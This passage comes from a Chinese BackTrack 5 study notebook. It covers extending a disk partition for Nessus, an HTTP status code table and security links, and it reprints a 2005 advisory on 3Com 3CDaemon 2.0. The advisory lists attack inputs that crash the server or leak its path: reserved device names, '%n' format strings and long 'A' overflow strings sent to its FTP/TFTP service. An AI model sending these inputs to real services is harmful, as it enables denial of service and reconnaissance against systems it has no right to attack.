重新开机进入系统,磁盘空间已成功扩展 oot@bt:~# fdisk -l Disk /dev/sda: 16.1 GB, 16106127360 bytes 255 heads, 63 sectors/track, 1958 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x00010475 Device Boot Start End /dev/sda1 * 1 994 Partition 1 does not end on cylinder boundary. /dev/sda2 994 1045 /dev/sda5 994 1045 但此时系统尚未正常识别扩展的空间 root@bt:~# df -h
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 40 页 /共 50 页

Blocks Id System 7977984 83 Linux 407553 407552 5 Extended 82 Linux swap / Solaris

BT5 学习笔记(文档建立:2014-1-9)

Filesystem /dev/sda1 none none none none none 创建新分区

Size Used Avail Use% Mounted on 7.5G 7.0G 126M 99% / 493M 164K 493M 1% /dev 501M 0 501M 0% /dev/shm 501M 72K 501M 1% /var/run 501M 0 501M 0% /var/lock 501M 0 501M 0% /lib/init/rw

root@bt:~# fdisk /dev/sda WARNING: DOS-compatible mode is deprecated. It's strongly recommended to switch off the mode (command 'c') and change display units to sectors (command 'u'). Command (m for help): ? ?: unknown command Command action a toggle a bootable flag b edit bsd disklabel c toggle the dos compatibility flag d delete a partition l list known partition types m print this menu n add a new partition o create a new empty DOS partition table p print the partition table q quit without saving changes s create a new empty Sun disklabel t change a partition's system id u change display/entry units v verify the partition table w write table to disk and exit x extra functionality (experts only) Command (m for help): n Command action l logical (5 or over) p primary partition (1-4) p Partition number (1-4): 2 Partition 2 is already defined. Delete it before re-adding it. Command (m for help): n
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 41 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Command action l logical (5 or over) p primary partition (1-4) p Partition number (1-4): 3 First cylinder (1045-1958, default 1045): Using default value 1045 Last cylinder, +cylinders or +size{K,M,G} (1045-1958, default 1958): Using default value 1958 Command (m for help): w The partition table has been altered! Calling ioctl() to re-read partition table. WARNING: Re-reading the partition table failed with error 16: Device or resource busy. The kernel still uses the old table. The new table will be used at the next reboot or after you run partprobe(8) or kpartx(8) Syncing disks. 格式化新分区 root@bt:~# mkfs -t ext3 /dev/sda3 mke2fs 1.41.11 (14-Mar-2010) warning: 4 blocks unused. Filesystem label= OS type: Linux Block size=4096 (log=2) Fragment size=4096 (log=2) Stride=0 blocks, Stripe width=0 blocks 459648 inodes, 1835008 blocks 91750 blocks (5.00%) reserved for the super user First data block=0 Maximum filesystem blocks=1879048192 56 block groups 32768 blocks per group, 32768 fragments per group 8208 inodes per group Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632 Writing inode tables: done Creating journal (32768 blocks): done Writing superblocks and filesystem accounting information: done
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 42 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

This filesystem will be automatically checked every 35 mounts or 180 days, whichever comes first. Use tune2fs -c or -i to override. 挂载新分区 root@bt:~# cd /home root@bt:/home# ls root@bt:/home# mkdir work root@bt:/home# ls work root@bt:/home# mount /dev/sda3 /home/work root@bt:/home# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 7.5G 7.0G 125M 99% / none 493M 168K 493M 1% /dev none 501M 0 501M 0% /dev/shm none 501M 72K 501M 1% /var/run none 501M 0 501M 0% /var/lock none 501M 0 501M 0% /lib/init/rw /dev/sda3 6.9G 144M 6.4G 3% /home/work 设置启动自动挂载 oot@bt:/etc# vi /etc/fstab 添加 /dev/sda3 /home/work ext3 defaults, 0 1

重启后,已可自动挂载 root@bt:~# df -h Filesystem /dev/sda1 none none
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 43 页 /共 50 页

Size Used Avail Use% Mounted on 7.5G 7.0G 125M 99% / 493M 168K 493M 1% /dev 501M 0 501M 0% /dev/shm

BT5 学习笔记(文档建立:2014-1-9)

none none none /dev/sda3

501M 72K 501M 0 501M 0 6.9G 144M

501M 1% /var/run 501M 0% /var/lock 501M 0% /lib/init/rw 6.4G 3% /home/work

移动程序至到新目录 mv 命令 Mv /opt/nessus/ /home/work/nessus(此处有报错,暂时不理)

使用链接,将新目录链接到原目录位置

终于有空间了

Nessu 搬家之后,需要初始化数据库,解决上面报错提示 root@bt:/home/work/nessus/sbin# ./nessusd -R 此过程大概需要一个小时,初始化成功后,重启系统,搬家完毕

附录
http 响应状态码大全
http 状态返回代码 1xx(临时响应) 表示临时响应并需要请求者继续执行操作的状态代码。 http 状态返回代码 代码 说明 100 (继续) 请求者应当继续提出请求。 服务器返回此代码表示已收到请求的第一部分, 正在等待其余部分。 101 (切换协议) 请求者已要求服务器切换协议,服务器已确认并准备切换。 http 状态返回代码 2xx (成功) 表示成功处理了请求的状态代码。 http 状态返回代码 代码 说明 200 (成功) 服务器已成功处理了请求。 通常,这表示服务器提供了请求的网页。
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 44 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

201 (已创建) 请求成功并且服务器创建了新的资源。 202 (已接受) 服务器已接受请求,但尚未处理。 203 (非授权信息) 服务器已成功处理了请求,但返回的信息可能来自另一来源。 204 (无内容) 服务器成功处理了请求,但没有返回任何内容。 205 (重置内容) 服务器成功处理了请求,但没有返回任何内容。 206 (部分内容) 服务器成功处理了部分 GET 请求。 http 状态返回代码 3xx (重定向) 表示要完成请求,需要进一步操作。 通常,这些状态代码用来重定向。 http 状态返回代码 代码 说明 300 (多种选择) 针对请求, 服务器可执行多种操作。 服务器可根据请求者 (user agent) 选择一项操作,或提供操作列表供请求者选择。 301 (永久移动) 请求的网页已永久移动到新位置。 服务器返回此响应(对 GET 或 HEAD 请求的响应)时,会自动将请求者转到新位置。 302 (临时移动) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位 置来进行以后的请求。 303 (查看其他位置) 请求者应当对不同的位置使用单独的 GET 请求来检索响应时, 服务器返回此代码。 304 (未修改) 自从上次请求后,请求的网页未修改过。 服务器返回此响应时,不会返 回网页内容。 305 (使用代理) 请求者只能使用代理访问请求的网页。 如果服务器返回此响应,还表 示请求者应使用代理。 307 (临时重定向) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有 位置来进行以后的请求。 http 状态返回代码 4xx(请求错误) 这些状态代码表示请求可能出错,妨碍了服务器的处理。 http 状态返回代码 代码 说明 400 (错误请求) 服务器不理解请求的语法。 401 (未授权) 请求要求身份验证。 对于需要登录的网页,服务器可能返回此响应。 403 (禁止) 服务器拒绝请求。 404 (未找到) 服务器找不到请求的网页。 405 (方法禁用) 禁用请求中指定的方法。 406 (不接受) 无法使用请求的内容特性响应请求的网页。 407 (需要代理授权) 此状态代码与 401(未授权)类似,但指定请求者应当授权使用 代理。 408 (请求超时) 服务器等候请求时发生超时。 409 (冲突) 服务器在完成请求时发生冲突。 服务器必须在响应中包含有关冲突的信 息。 410 (已删除) 如果请求的资源已永久删除,服务器就会返回此响应。 411 (需要有效长度) 服务器不接受不含有效内容长度标头字段的请求。 412 (未满足前提条件) 服务器未满足请求者在请求中设置的其中一个前提条件。 413 (请求实体过大) 服务器无法处理请求,因为请求实体过大,超出服务器的处理能 力。 414 (请求的 URI 过长) 请求的 URI(通常为网址)过长,服务器无法处理。
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 45 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

415 (不支持的媒体类型) 请求的格式不受请求页面的支持。 416 (请求范围不符合要求) 如果页面无法提供请求的范围,则服务器会返回此状态代 码。 417 (未满足期望值) 服务器未满足"期望"请求标头字段的要求。 http 状态返回代码 5xx(服务器错误) 这些状态代码表示服务器在尝试处理请求时发生内部错误。 这些错误可能是服务器本身的 错误,而不是请求出错。 http 状态返回代码 代码 说明 500 (服务器内部错误) 服务器遇到错误,无法完成请求。 501 (尚未实施) 服务器不具备完成请求的功能。 例如,服务器无法识别请求方法时可 能会返回此代码。 502 (错误网关) 服务器作为网关或代理,从上游服务器收到无效响应。 503 (服务不可用) 服务器目前无法使用(由于超载或停机维护) 。 通常,这只是暂时 状态。 504 (网关超时) 服务器作为网关或代理,但是没有及时从上游服务器收到请求。 505 (HTTP 版本不受支持) 服务器不支持请求中所用的 HTTP 协议版本。 一些常见的 http 状态返回代码为: 200 - 服务器成功返回网页 404 - 请求的网页不存在 503 - 服务不可用

常用链接
以下网站是我在学习过程中遇到的,个人认为比较有价值的网站

BT 官方网站
http://www.backtrack-linux.org

cvedetails
http://cvedetails.com/

Metasploit Unleashed
http://www.offensive-security.com/information-security-training/

md5 在线解密
http://cmd5.com/

owasp.org
https://www.owasp.org/index.php/Main_Page

infosec
http://resources.infosecinstitute.com
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 46 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

URL Decoder/Encoder
http://meyerweb.com/eric/tools/dencoder/

php charset encoder
http://yehg.net/encoding/

乌云网
http://www.wooyun.org/

典型漏洞
以下是我在学习中测试过的漏洞

3Com 3CDaemon 2.0 revision 10
此漏洞在 metasploit 中只有 exploit,而没有对应的 payloads 3Com 3CDaemon Multiple Vulnerabilities By Sowhat 04.JAN.2005 http://secway.org/advisory/ad20041011.txt [I.T.S] Security Research Team Product Affected: 3Com 3CDaemon 2.0 revision 10 Vendor: www.3Com.com (1) BACKGROUD 3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com. For more information, http://support.3com.com/software/utilities_for_windows_32_bit.htm ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip 3CDaemon is full of holes,ISS and Wang Ning <nwang (at) scn.com (dot) cn [email concealed]> has already reported some bugz about 3CDaemon (see: http://xforce.iss.net/xforce/xfdb/8970 http://www.securityfocus.org/bid/11944 ) And I doucument some other well-known bugz here again :) (2) Details Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows attackers to execute arbitrary command as the user running 3CDaemon (usually
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 47 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Administrator).Some of these Vulnerabilities didnt need a valid username and password to login. There are several vulnerabilies 1.TFTP Reserved Device Name Denial of Service D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn The 3CDaemon will be crashed with some msgs like "Microsoft Visual C++ Runtime library" "Runtime Error!" "Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe " "abnormal program termination". 2.FTP Username Format String vulnerability H:\>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): %n Connection closed by remote host. OR: H:\>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): %s 331 User name ok, need password Password:[anythinghere] 530 Login access denied Login failed. ftp> And then the 3CDaemon is dead. 3.FTP long Username Buffer overflow D:\WINDOWS\system32>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): 501 Invalid or missing parameters Login failed. ftp> user AAA..[about 241 A here]...AAAAA Connection closed by remote host. 4.Multiple FTP command long parameter Buffer overflow
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 48 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Including:cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on (Maybe this is what ISS's Advisory talking about) ftp> cd AAA..[about 398 A here]...AAAAA Connection closed by remote host. ftp> ftp> ls AAA..[about 247 A here]...AAAAA 200 PORT command successful. Connection closed by remote host. ftp> put 1.txt AAA..[about 247 A here]...AAAAA 200 PORT command successful. 532 Need account for storing files Connection closed by remote host. It seems that the length of the "A" is different from every command. 5.Multiple FTP command Format string Including:cd,delete,rename,rmdir,literal,stat,CWD, and so on 230 User logged in ftp> cd %n Connection closed by remote host. ftp> 6.Multiple FTP command Reserved Device Name Information Leak Including cd,and so on The following command will disclosure the physical path of the 3cdaemon ftp> cd aux 550 aux : C:/3cdaemon/aux is not a directory! ftp> cd lpt1 550 lpt1 : C:/3cdaemon/lpt1 is not a directory! and also ,CD an exsiting filename will disclosure physical path too. ftp> cd toolz.rar 550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory! There are still some other boring bugz ,but it's enough : >

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 49 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

(3) WORKAROUND Workaroud ? No...... (4) Vendor Response Since it seems that 3com didnt maintained 3CDaemon for a long long time ,I dint contact them :) http://secway.org Thank to all the members of ITS Security Team

后记
对于 BT5 来说,我也是一名技术小白,因为在学习之初,在网上没有发现比较系统的学 习资料,为了系统化知识内容,决定把自己的学习过程完整的记录下来 学习过程中,愈来愈发现安全范围之深之广,所以里面也包含了其他安全方面内容 输入命令的时候请注意大小写,linux 下一般都为小写(文档中的首字母大写是 word 中 的自动改正功能导致的)

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 50 页 /共 50 页


相关文章:
backtrack5学习笔记.doc
backtrack5学习笔记_计算机软件及应用_IT/计算机_专业资料。backtrack5 学习笔记...社会工程学工具 set 首先呢,说说什么是 SET,她是 bt5 集成的一个综合性工具,...
01 BT5R3学习日记_图文.doc
01 BT5R3学习日记 - BackTrack 5 自学手册 不断更新... BT5R3 学习日记 1、VMware 中安装 1.)CDROM 启动后 root@bt:~# startx 2.)利用自带安装包安装。 ...
BT5学习教程.doc
BT5学习教程_计算机软件及应用_IT/计算机_专业资料。1. BackTrac
BT5常用配置命令2.doc
BT5常用配置命令2 - backtrack5 学习笔记 2012-09-20
bt5使用教程呢_图文.doc
所以决定开个帖子讲讲 bt5 在渗透方 面的应用。这个帖子的主要是根据教主的视频教程,《LiNUX--BT4hei 客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,...
Metasploit渗透测试指南读书笔记一到四章_图文.pdf
Metasploit渗透测试指南读书笔记一到四章 - Metasploit 渗透测试指南读书笔记一到四章 第一章渗透测试技术基础 第二章Metasploit 基础 Armitage 是 me...
部署BackTrack5全过程_图文.pdf
学习笔记 5月11日,BT5如期和大家见面。 扫盲:什么是BT5 BackTra
攻克TOEFL阅读之我见:阅读有5大BT特点_英语考试_外语学习_教育专区.doc
BT5 主题深加强母语文章训练。利用技巧。抓住梗概。 TOEFL 阅读法 第一步,...最有讲一下资料:真题,阅读笔记电子书,hank 阅读笔记,toefl 词汇,考 g 的直接...
更多相关标签: